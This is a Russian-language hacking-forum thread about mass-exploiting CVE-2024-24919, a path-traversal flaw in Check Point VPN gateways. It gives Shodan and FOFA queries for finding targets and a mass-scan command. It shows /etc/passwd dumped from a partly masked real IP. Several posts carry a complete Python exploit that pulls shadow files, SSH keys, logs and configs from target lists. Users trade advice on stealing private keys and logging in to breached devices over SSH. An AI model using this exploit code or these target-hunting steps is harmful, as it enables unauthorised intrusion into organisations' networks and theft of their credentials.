Remote CVE-2024-24919 Check Point Remote Access VPN

Focus17 · 01.06.2024

GitHub - RevoltSecurities/CVE-2024-24919: An Vulnerability detection and Exploitation tool for CVE-2024-24919

An Vulnerability detection and Exploitation tool for CVE-2024-24919 - RevoltSecurities/CVE-2024-24919

github.com

Shodan"Server: Check Point SVN"
fofatitle=="Check Point SSL Network Extender"

Код:

python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd


    ______     ____  __         _ ______        
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /  
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/    
 
                    @RevoltSecurities

[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false

shodan count "Server: Check Point SVN"
53758

rwxrwx · 02.06.2024

Nice way to capture SSH keys and get full access

TCPRAPE · 02.06.2024

Брутить заёба, но собрали приятно.

blackhunt · 02.06.2024

Correct Usage of aiohttp for Ensuring Proper Session Closure

Python:

async def run_threads(urls, args):
    """
    Manage threads and event loop for exploitation.
    """
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        uvloop.install()
        async with aiohttp.ClientSession() as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                await load_tasks(urls, session, sem, bar, args)
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")

Che · 02.06.2024

У кого нибудь работает ShodaX?
не могу запустить, пишет мол если так происходит всегда, отпишите разрабу. Очевидно отпишешь и тебе предложат "лицензию")

[INFO]: Import Error occured in Module imports due to: attempted relative import with no known parent package
[INFO]: If you are encountering this issue more than a time please report the issues in ShodanX Github page..

Sec13B · 03.06.2024

/etc/passwd
/etc/shadow
/var/log/auth
/var/log/messages

nobody0 · 03.06.2024

aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?
отфильтровал 22 открытый - рефузы по айпи и тд. Пробовал через клиент win - чет не особо удачно, может мало кредов перебрал .
Там уже сразу залился товарищ некий везде - кто видел тот знает . Интересно тоже как его креды там в шэдоу появились

Уязвимы как понимаю куча gateway разных продуктов - самая уяза в webpage ssl extender . (при посещении уязвимого сервиса вылазит этот pop-up)
Вот собственно список уязвимых Gateway - продуктов.
ProductCloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances
VersionR77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20

высокий_риск · 03.06.2024

Python:

async def exploit(session, url, sem, bar):
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url)) 
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))
            
            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")
        
        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass
    
    except aiohttp.ClientConnectionError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
            
    except KeyboardInterrupt:
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()
        sem.release()

create a new folder called "success" and edit this part of the code

высокий_риск · 03.06.2024

Python:

async def save(result, args, target_folder=None, filename="results.txt"):
    try:
        if target_folder:
            if not os.path.exists(target_folder):
                os.makedirs(target_folder)
            filename = os.path.join(target_folder, filename)
        else:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, "results.txt")
                else:
                    filename = args.output
            else:
                filename = "results.txt"

        async with aiofiles.open(filename, "a") as w:
            await w.write(result + '\n')

    except KeyboardInterrupt:
        quit()
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        pass

async def fetch_file(session, url, file_path, proxy):
    base_url = f"{url}/clients/MyCRL"
    file_data = f"aCSHELL/../../../../../../..{file_path}"
 
    headers = {
        "User-Agent": UserAgent().random,
        "Content-Length": str(len(file_data))
    }

    async with session.post(base_url, timeout=10, headers=headers, proxy=proxy, ssl=False, data=file_data) as response:
        await asyncio.sleep(0.0001)
        if response.status == 200:
            return await response.content.read()
    return None

async def exploit(session, url, sem, bar):
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url))  # Replace non-alphanumeric characters with underscore
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))
         
            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")
     
        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass
 
    except aiohttp.ClientConnectionError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
         
    except KeyboardInterrupt:
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()
        sem.release()

async def loader(urls, session, sem, bar):
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)
         
        await asyncio.gather(*tasks, return_exceptions=True)
    except KeyboardInterrupt:
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")

async def threads(urls):
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        customloops = uvloop.new_event_loop()
        asyncio.set_event_loop(loop=customloops)
        loops = asyncio.get_event_loop()
        async with aiohttp.ClientSession(loop=loops) as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                loops.run_until_complete(await loader(urls, session, sem, bar))
    except RuntimeError:
        pass
    except KeyboardInterrupt:
        SystemExit
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")

async def main():
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)
             
        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)

    except FileNotFoundError:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit
     
    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    asyncio.run(main())

new argument "--full"

Sec13B · 02.07.2024

nobody0 сказал(а):

aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?
отфильтровал 22 открытый - рефузы по айпи и тд. Пробовал через клиент win - чет не особо удачно, может мало кредов перебрал .
Там уже сразу залился товарищ некий везде - кто видел тот знает . Интересно тоже как его креды там в шэдоу появились

Уязвимы как понимаю куча gateway разных продуктов - самая уяза в webpage ssl extender . (при посещении уязвимого сервиса вылазит этот pop-up)
Вот собственно список уязвимых Gateway - продуктов.
ProductCloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances
VersionR77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20

why /home/root/.ssh/id_rsa
and not root/.ssh/id_rsa ?

wav · 20.07.2024

Ребята подскажите каким клиентом конектиться к таргету ?

rwxrwx · 21.07.2024

wav сказал(а):

Guys, tell me which client to use to connect to the target?

Check Point Endpoint Security VPN client E88.41 (latest version), available on the vendor official website

smitmash · 04.08.2024

высокий_риск сказал(а):

Python:

async def save(result, args, target_folder=None, filename="results.txt"):
    try:
        if target_folder:
            if not os.path.exists(target_folder):
                os.makedirs(target_folder)
            filename = os.path.join(target_folder, filename)
        else:
            if args.output:
                if os.path.isfile(args.output):
                    filename = args.output
                elif os.path.isdir(args.output):
                    filename = os.path.join(args.output, "results.txt")
                else:
                    filename = args.output
            else:
                filename = "results.txt"

        async with aiofiles.open(filename, "a") as w:
            await w.write(result + '\n')

    except KeyboardInterrupt:
        quit()
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        pass

async def fetch_file(session, url, file_path, proxy):
    base_url = f"{url}/clients/MyCRL"
    file_data = f"aCSHELL/../../../../../../..{file_path}"
 
    headers = {
        "User-Agent": UserAgent().random,
        "Content-Length": str(len(file_data))
    }

    async with session.post(base_url, timeout=10, headers=headers, proxy=proxy, ssl=False, data=file_data) as response:
        await asyncio.sleep(0.0001)
        if response.status == 200:
            return await response.content.read()
    return None

async def exploit(session, url, sem, bar):
    try:
        proxy = args.proxy if args.proxy else None
        if args.full:
            target_folder = os.path.join('success', re.sub(r'\W+', '_', url))  # Replace non-alphanumeric characters with underscore
            files_to_fetch = [
                "/etc/passwd",
                "/etc/shadow",
                "/etc/hosts",
                "/etc/hostname",
                "/etc/network/interfaces",
                "/etc/resolv.conf",
                "/etc/vpn/vpn.conf",
                "/etc/firewall/firewall.conf",
                "/var/log/auth.log",
                "/var/log/syslog",
                "/opt/checkpoint/conf/",
                "/var/log/checkpoint/",
                "/home/",
                "/etc/group",
                "/etc/gshadow",
                "/etc/fstab",
                "/etc/mtab",
                "/etc/exports",
                "/etc/cron.d/",
                "/etc/cron.daily/",
                "/etc/cron.hourly/",
                "/etc/cron.monthly/",
                "/etc/cron.weekly/",
                "/etc/at.deny",
                "/etc/at.allow",
                "/var/log/dmesg",
                "/var/log/kern.log",
                "/var/log/daemon.log",
                "/var/log/mail.log",
                "/var/log/faillog",
                "/var/log/lastlog",
                "/var/log/secure",
                "/etc/ssh/sshd_config",
                "/root/.ssh/authorized_keys",
                "/home/*/.ssh/authorized_keys",
                "/etc/nginx/nginx.conf",
                "/etc/httpd/httpd.conf",
                "/etc/mysql/my.cnf",
                "/etc/postgresql/",
                "/var/www/",
                "/var/lib/mysql/",
                "/var/lib/postgresql/",
                "/etc/sudoers",
                "/etc/apparmor.d/",
                "/etc/selinux/"
            ]

            for file_path in files_to_fetch:
                content = await fetch_file(session, url, file_path, proxy)
                if content:
                    content = content.decode("utf-8")
                    await save(content, args, target_folder, filename=file_path.replace('/', '_'))
       
            print(f"[{bold}{green}Full Extraction Completed{reset}]: {bold}{white}{url}{reset}")
   
        else:
            content = await fetch_file(session, url, args.file_to_dump, proxy)
            if content:
                content = content.decode("utf-8")
                print(f"[{bold}{green}Vulnerable{reset}]: {bold}{white}{url}\n{content}{reset}")
                await save(f"{url}\n{content}\n-----------------------------------------------------------------------------------", args)

    except KeyError:
        pass
 
    except aiohttp.ClientConnectionError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
    except TimeoutError:
        if args.verbose:
            print(f"[{bold}{yellow}WRN{reset}]: {bold}{white}Timeout reached for {url}{reset}")
       
    except KeyboardInterrupt:
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except aiohttp.InvalidURL:
        pass
    except Exception as e:
        print(f"Exception in exploit: {e}, {type(e)}")
    finally:
        bar()
        sem.release()

async def loader(urls, session, sem, bar):
    try:
        tasks = []
        for url in urls:
            await sem.acquire()
            task = asyncio.ensure_future(exploit(session, url, sem, bar))
            tasks.append(task)
       
        await asyncio.gather(*tasks, return_exceptions=True)
    except KeyboardInterrupt:
        SystemExit
    except asyncio.CancelledError:
        SystemExit
    except Exception as e:
        print(f"Exception in loader: {e}, {type(e)}")

async def threads(urls):
    try:
        urls = list(set(urls))
        sem = asyncio.BoundedSemaphore(args.threads)
        customloops = uvloop.new_event_loop()
        asyncio.set_event_loop(loop=customloops)
        loops = asyncio.get_event_loop()
        async with aiohttp.ClientSession(loop=loops) as session:
            with alive_bar(title=f"Exploiter", total=len(urls), enrich_print=False) as bar:
                loops.run_until_complete(await loader(urls, session, sem, bar))
    except RuntimeError:
        pass
    except KeyboardInterrupt:
        SystemExit
    except Exception as e:
        print(f"Exception in threads: {e}, {type(e)}")

async def main():
    try:
        urls = []
        if args.url:
            if args.url.startswith("https://") or args.url.startswith("http://"):
                urls.append(args.url)
            else:
                new_url = f"https://{args.url}"
                urls.append(new_url)
                new_http = f"http://{args.url}"
                urls.append(new_http)
            await threads(urls)
           
        if args.list:
            async with aiofiles.open(args.list, "r") as streamr:
                async for url in streamr:
                    url = url.strip()
                    if url.startswith("https://") or url.startswith("http://"):
                        urls.append(url)
                    else:
                        new_url = f"https://{url}"
                        urls.append(new_url)
                        new_http = f"http://{url}"
                        urls.append(new_http)
            await threads(urls)

    except FileNotFoundError:
        print(f"[{bold}{red}WRN{reset}]: {bold}{white}{args.list} no such file or directory{reset}")
        SystemExit
   
    except Exception as e:
        print(f"Exception in main: {e}, {type(e)}")

if __name__ == "__main__":
    asyncio.run(main())

new argument "--full"

не работают твои аргументы --full !!!
странно ввёл ip имя пользователя пароль ввёл пишет не верное имя пользователя или пароль

DoomSlayer2002 · 04.08.2024

nobody0 сказал(а):

aCSHELL/../../../../../../../home/root/.ssh/id_rsa
или *admin

Получив креды - куда с ними можно вломиться , где логин панели ?

id_rsa это приват ключик - его надо себе сохранить и дальше на ссш логиниться типо так: ssh -i id_rsa root@пробитый_девайс

DoomSlayer2002 · 04.08.2024

smitmash сказал(а):

admin:x:0:0:Linux User,,,:/:/bin/clish

попробуй тянуть

/home/admin/.ssh/id_rsa
/home/tsteele/.ssh/id_rsa
/home/tricky/.ssh/id_rsa

и как выше написал логиниться на ссш под этими юзерами с ключиками

smitmash · 04.08.2024

чё то не находит, не там не там.
/root/.ssh/id_rsa
/home/admin/.ssh/id_rsa

smitmash · 05.08.2024

Может кто нашёл в каком файлике хранятся юзеры и пасы для подключения через клиент Check Point SSL Network Extender ???

Remote CVE-2024-24919 Check Point Remote Access VPN

Focus17

(L2) cache

GitHub - RevoltSecurities/CVE-2024-24919: An Vulnerability detection and Exploitation tool for CVE-2024-24919

rwxrwx

(L3) cache

TCPRAPE

HDD-drive

blackhunt

(L2) cache

Correct Usage of aiohttp for Ensuring Proper Session Closure

Che

RAM

Sec13B

(L3) cache

nobody0

Никт0

высокий_риск

HDD-drive

высокий_риск

HDD-drive

Sec13B

(L3) cache

wav

(L3) cache

rwxrwx

(L3) cache

smitmash

HDD-drive

DoomSlayer2002

(L2) cache

DoomSlayer2002

(L2) cache

smitmash

HDD-drive

smitmash

HDD-drive

Remote CVE-2024-24919 Check Point Remote Access VPN

(L2) cache

(L3) cache

HDD-drive

(L2) cache

Correct Usage of aiohttp for Ensuring Proper Session Closure ​

RAM

(L3) cache

Никт0

HDD-drive

HDD-drive

(L3) cache

(L3) cache

(L3) cache

HDD-drive

(L2) cache

(L2) cache

HDD-drive

HDD-drive

Correct Usage of aiohttp for Ensuring Proper Session Closure